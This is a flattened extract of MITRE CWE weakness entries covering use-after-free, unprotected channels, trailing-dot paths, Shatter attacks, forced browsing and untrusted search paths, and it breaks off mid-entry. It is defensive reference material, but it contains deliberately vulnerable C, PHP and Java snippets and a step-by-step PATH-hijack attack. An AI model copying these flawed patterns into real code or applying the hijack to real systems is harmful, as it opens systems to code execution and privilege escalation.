- - The use of previously-freed memory can have any number of adverse consequences, ranging from the corruption of valid data to the execution of arbitrary code, depending on the instantiation and timing of the flaw. The simplest way data corruption may occur involves the system's reuse of the freed memory. Use-after-free errors have two common and sometimes overlapping causes: - - - Error conditions and other exceptional circumstances. - Confusion over which part of the program is responsible for freeing the memory. - - - In this scenario, the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation. As the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process. - If the newly allocated data chances to hold a class, in C++ for example, various function pointers may be scattered within the heap data. If one of these function pointers is overwritten with an address to valid shellcode, execution of arbitrary code can be achieved. - - - - - - - - - - - - - - - - Dangling pointer - - - Use-After-Free - - - - - Architecture and Design - - - Implementation - - - High - - - Integrity - Modify Memory - The use of previously freed memory may corrupt valid data, if the memory area in question has been allocated and used properly elsewhere. - - - Availability - DoS: Crash, Exit, or Restart - If chunk consolidation occurs after the use of previously freed data, the process may crash when invalid data is used as chunk information. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - If malicious data is entered before chunk consolidation can take place, it may be possible to take advantage of a write-what-where primitive to execute arbitrary code. - - - - - Architecture and Design - Choose a language that provides automatic memory management. - - - Implementation - When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy. - - - - - The following example demonstrates the weakness. - - #include <stdio.h>#include <unistd.h>#define BUFSIZER1 512#define BUFSIZER2 ((BUFSIZER1/2) - 8)int main(int argc, char **argv) {char *buf1R1;char *buf2R1;char *buf2R2;char *buf3R2;buf1R1 = (char *) malloc(BUFSIZER1);buf2R1 = (char *) malloc(BUFSIZER1);free(buf2R1);buf2R2 = (char *) malloc(BUFSIZER2);buf3R2 = (char *) malloc(BUFSIZER2);strncpy(buf2R1, argv[1], BUFSIZER1-1);free(buf1R1);free(buf2R2);free(buf3R2);} - - - - The following code illustrates a use after free error: - - char* ptr = (char*)malloc (SIZE);if (err) {abrt = 1;free(ptr);}...if (abrt) {logError("operation aborted before commit", ptr);} - - When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function. - - - - - CVE-2010-4168 - Use-after-free triggered by closing a connection while data is still being transmitted. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4168 - - - CVE-2010-2941 - Improper allocation for invalid data leads to use-after-free. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2941 - - - CVE-2010-2547 - certificate with a large number of Subject Alternate Names not properly handled in realloc, leading to use-after-free - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2547 - - - CVE-2010-1772 - Timers are not disabled when a related object is deleted - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1772 - - - CVE-2010-1437 - Access to a "dead" object that is being cleaned up - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437 - - - CVE-2010-1208 - object is deleted even with a non-zero reference count, and later accessed - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1208 - - - CVE-2010-0629 - use-after-free involving request containing an invalid version number - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0629 - - - CVE-2010-0378 - unload of an object that is currently being accessed by other functionality - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0378 - - - CVE-2010-0302 - incorrectly tracking a reference count leads to use-after-free - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0302 - - - CVE-2010-0249 - use-after-free related to use of uninitialized memory - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249 - - - CVE-2010-0050 - HTML document with incorrectly-nested tags - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0050 - - - CVE-2009-3658 - Use after free in ActiveX object by providing a malformed argument to a method - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3658 - - - CVE-2009-3616 - use-after-free by disconnecting during data transfer, or a message containing incorrect data types - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3616 - - - CVE-2009-3553 - disconnect during a large data transfer causes incorrect reference count, leading to use-after-free - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553 - - - CVE-2009-2416 - use-after-free found by fuzzing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416 - - - CVE-2009-1837 - Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1837 - - - CVE-2009-0749 - realloc generates new buffer and pointer, but previous pointer is still retained, leading to use after free - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0749 - - - CVE-2010-3328 - Use-after-free in web browser, probably resultant from not initializing memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3328 - - - CVE-2008-5038 - use-after-free when one thread accessed memory that was freed by another thread - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5038 - - - CVE-2008-0077 - assignment of malformed values to certain properties triggers use after free - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0077 - - - CVE-2006-4434 - mail server does not properly handle a long header. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4434 - - - CVE-2010-2753 - chain: integer overflow leads to use-after-free - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2753 - - - CVE-2006-4997 - freed pointer dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4997 - - - - Memory - - - - Use After Free - - - Using freed memory - - - MEM00-C - Allocate and free memory in the same module, at the same level of abstraction - - - MEM01-C - Store a new value in pointers immediately after free() - - - MEM30-C - Do not access freed memory - Exact - - - SFP7 - Faulty Pointer Use - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Alternate_Terms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - The software uses a primary channel for administration or restricted functionality, but it does not properly protect the channel. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - - - - - Architecture and Design - Do not expose administrative functionnality on the user UI. - - - Architecture and Design - Protect the administrative/restricted functionality with a strong authentication mechanism. - - - - - Unprotected Primary Channel - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - - - A software system that accepts path input in the form of trailing dot ('filedir.') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - CVE-2000-1114 - Source code disclosure using trailing dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1114 - - - CVE-2002-1986 - Source code disclosure using trailing dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1986 - - - CVE-2004-2213 - Source code disclosure using trailing dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213 - - - CVE-2005-3293 - Source code disclosure using trailing dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293 - - - CVE-2004-0061 - Bypass directory access restrictions using trailing dot in URL - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0061 - - - CVE-2000-1133 - Bypass directory access restrictions using trailing dot in URL - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1133 - - - CVE-2001-1386 - Bypass check for ".lnk" extension using ".lnk." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386 - - - - - Trailing Dot - 'filedir.' - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Trailing Dot - 'filedir.' - - - - The software protects a primary channel, but it does not use the same level of protection for an alternate channel. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Operation - - - - - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - - - - - Architecture and Design - Identify all alternate channels and use the same protection mechanisms that are used for the primary channels. - - - - - CVE-2002-0567 - DB server assumes that local clients have performed authentication, allowing attacker to directly connect to a process to load libraries and execute commands; a socket interface also exists (another alternate channel), so attack can be remote. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0567 - - - CVE-2002-1578 - Product does not restrict access to underlying database, so attacker can bypass restrictions by directly querying the database. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1578 - - - CVE-2003-1035 - User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1035 - - - CVE-2002-1863 - FTP service can not be disabled even when other access controls would require it. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1863 - - - CVE-2002-0066 - Windows named pipe created without authentication/access control, allowing configuration modification. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0066 - - - CVE-2004-1461 - Router management interface spawns a separate TCP connection after authentication, allowing hijacking by attacker coming from the same IP address. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1461 - - - - - Unprotected Alternate Channel - - - - This can be primary to authentication errors, and resultant from unhandled error conditions. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The product opens an alternate channel to communicate with an authorized user, but the channel is accessible to other actors. - This creates a race condition that allows an attacker to access the channel before the authorized user does. - - - - - - - - - - Architecture and Design - - - - - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - - - - - CVE-1999-0351 - FTP "Pizza Thief" vulnerability. Attacker can connect to a port that was intended for use by another client. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0351 - - - CVE-2003-0230 - Product creates Windows named pipe during authentication that another attacker can hijack by connecting to it. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0230 - - - - System Process - - - - Alternate Channel Race Condition - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-01-12 - updated References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Alternate Channel Race Condition - - - - The software does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product. - - - - - - - - - - Architecture and Design - - - - - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - - - - - Architecture and Design - Always verify and authenticate the source of the message. - - - - - CVE-2002-0971 - Bypass GUI and access restricted dialog box. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0971 - - - CVE-2002-1230 - Gain privileges via Windows message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1230 - - - CVE-2003-0350 - A control allows a change to a pointer for a callback function using Windows message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0350 - - - CVE-2003-0908 - Product launches Help functionality while running with raised privileges, allowing command execution using Windows message to access "open file" dialog. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0908 - - - CVE-2004-0213 - Attacker uses Shatter attack to bypass GUI-enforced protection for CVE-2003-0908. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213 - - - CVE-2004-0207 - User can call certain API functions to modify certain properties of privileged programs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0207 - - - - System Process - - - - Unprotected Windows Messaging Channel ('Shatter') - - - SFP30 - Missing endpoint authentication - - - - - - - - - Overlaps privilege errors and UI errors. - - Possibly under-reported, probably under-studied. It is suspected that a number of publicized vulnerabilities that involve local privilege escalation on Windows systems may be related to Shatter attacks, but they are not labeled as such. - Alternate channel attacks likely exist in other operating systems and messaging models, e.g. in privileged X Windows applications, but examples are not readily available. - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Other_Notes, Relationship_Notes, Research_Gaps - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This entry has been deprecated because it was a duplicate of CWE-441. All content has been transferred to CWE-441. - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-05 - deprecated this entry as a duplicate of 441 - - - CWE Content Team - MITRE - 2008-11-24 - updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Name - - Proxied Trusted Channel - DEPRECATED (Duplicate): Proxied Trusted Channel - - - - The product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources. - - - - - - - - - - Architecture and Design - - - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - - - - - Architecture and Design - Deploy different layers of protection to implement security in depth. - - - - - Alternate Path Errors - - - SFP35 - Insecure resource access - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Alternate Path Errors - Failure to Protect Alternate Path - - - - The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files. - Web applications susceptible to direct request attacks often make the false assumption that such resources can only be reached through a given navigation path and so only apply authorization at certain points in the path. - - - - - - - - - - - - - - - forced browsing - The "forced browsing" term could be misinterpreted to include weaknesses such as CSRF or XSS, so its use is discouraged. - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Availability - Access Control - Read Application Data - Modify Application Data - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - - - - - Architecture and Design - Operation - Apply appropriate access control authorizations for each access to all restricted URLs, scripts or files. - - - Architecture and Design - Consider using MVC based frameworks such as Struts. - - - - - If forced browsing is possible, an attacker may be able to directly access a sensitive page by entering a URL similar to the following. - - http://somesite.com/someapplication/admin.jsp - - - - - - CVE-2004-2144 - Bypass authentication via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2144 - - - CVE-2005-1892 - Infinite loop or infoleak triggered by direct requests. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1892 - - - CVE-2004-2257 - Bypass auth/auth via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2257 - - - CVE-2005-1688 - Direct request leads to infoleak by error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1688 - - - CVE-2005-1697 - Direct request leads to infoleak by error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1697 - - - CVE-2005-1698 - Direct request leads to infoleak by error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1698 - - - CVE-2005-1685 - Authentication bypass via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1685 - - - CVE-2005-1827 - Authentication bypass via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1827 - - - CVE-2005-1654 - Authorization bypass using direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1654 - - - CVE-2005-1668 - Access privileged functionality using direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1668 - - - CVE-2002-1798 - Upload arbitrary files via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1798 - - - - - Direct Request aka 'Forced Browsing' - - - A10 - Failure to Restrict URL Access - CWE More Specific - - - A1 - Unvalidated Input - CWE More Specific - - - A2 - Broken Access Control - CWE More Specific - - - 34 - Predictable Resource Location - - - SFP30 - Missing endpoint authentication - - - - - - - - - Overlaps Modification of Assumed-Immutable Data (MAID), authorization errors, container errors; often primary to other weaknesses such as XSS and SQL injection. - "Forced browsing" is a step-based manipulation involving the omission of one or more steps, whose order is assumed to be immutable. The application does not verify that the first step was performed successfully before the second step. The consequence is typically "authentication bypass" or "path disclosure," although it can be primary to all kinds of weaknesses, especially in languages such as PHP, which allow external modification of assumed-immutable variables. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Relationships, Relationship_Notes, Taxonomy_Mappings, Theoretical_Notes - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Applicable_Platforms, Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The application searches for critical resources using an externally-supplied search path that can point to resources that are not under the application's direct control. - - This might allow attackers to execute their own programs, access unauthorized data files, or modify configuration in unexpected ways. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. The problem extends to any type of critical resource that the application trusts. - Some of the most common variants of untrusted search path are: - - - In various UNIX and Linux-based systems, the PATH environment variable may be consulted to locate executable programs, and LD_PRELOAD may be used to locate a separate library. - In various Microsoft-based systems, the PATH environment variable is consulted to locate a DLL, if the DLL is not found in other paths that appear earlier in the search order. - - - - - - - - - - - - - - - - - Untrusted Path - - - - - Architecture and Design - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Access Control - Gain Privileges or Assume Identity - Execute Unauthorized Code or Commands - There is the potential for arbitrary code execution with privileges of the vulnerable program. - - - Availability - DoS: Crash, Exit, or Restart - The program could be redirected to the wrong files, potentially triggering a crash or hang when the targeted file is too large or does not have the expected format. - - - Confidentiality - Read Files or Directories - The program could send the output of unauthorized files to the attacker. - - - - - Black Box - - Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. - Attach the monitor to the process and look for library functions and system calls that suggest when a search path is being used. One pattern is when the program performs multiple accesses of the same file but in different directories, with repeated failures until the proper filename is found. Library calls such as getenv() or their equivalent can be checked to see if any path-related variables are being accessed. - - - - Automated Static Analysis - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Manual Analysis - Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - - - Architecture and Design - Implementation - Attack Surface Reduction - Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428. - - - Implementation - When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths. - - - Implementation - Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths. - - - Implementation - Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory. - - - Implementation - Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of it, while execl() and execv() require a full path. - - - - - This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system. - - #define DIR "/restricted/directory" - char cmd[500];sprintf(cmd, "ls -l %480s", DIR); - /* Raise privileges to those needed for accessing DIR. */ - - RaisePrivileges(...);system(cmd);DropPrivileges(...);... - - This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can't control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges. - However, because the program does not modify the PATH environment variable, the following attack would work: - - - The user sets the PATH to reference a directory under the attacker's control, such as "/my/dir/". - The attacker creates a malicious program called "ls", and puts that program in /my/dir - The user executes the program. - When system() is executed, the shell consults the PATH to find the ls program - The program finds the attacker's malicious program, "/my/dir/ls". It doesn't find "/bin/ls" because PATH does not contain "/bin/". - The program executes the attacker's malicious program with the raised privileges. - - - - - This code prints all of the running processes belonging to the current user. - - - - //assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78) - $userName = getCurrentUser();$command = 'ps aux | grep ' . $userName;system($command); - - If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users. - - - The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges. - - ...System.Runtime.getRuntime().exec("make");... - - The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker's make will now be run with these privileges, possibly giving the attacker complete control of the system. - - - - - CVE-1999-1120 - Application relies on its PATH environment variable to find and execute program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1120 - - - CVE-2008-1810 - Database application relies on its PATH environment variable to find and execute program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1810 - - - CVE-2007-2027 - Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2027 - - - CVE-2008-3485 - Untrusted search path using malicious .EXE in Windows environment. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3485 - - - CVE-2008-2613 - setuid program allows compromise using path that finds and loads a malicious library. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2613 - - - CVE-2008-1319 - Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1319 - - - - Program Invocation - Code Libraries - - - System Process - - - - Untrusted Search Path - - - Relative path library search - - - ENV03-C - Sanitize the environment when invoking external programs - - - - - - - - - - - - - - Search path issues on 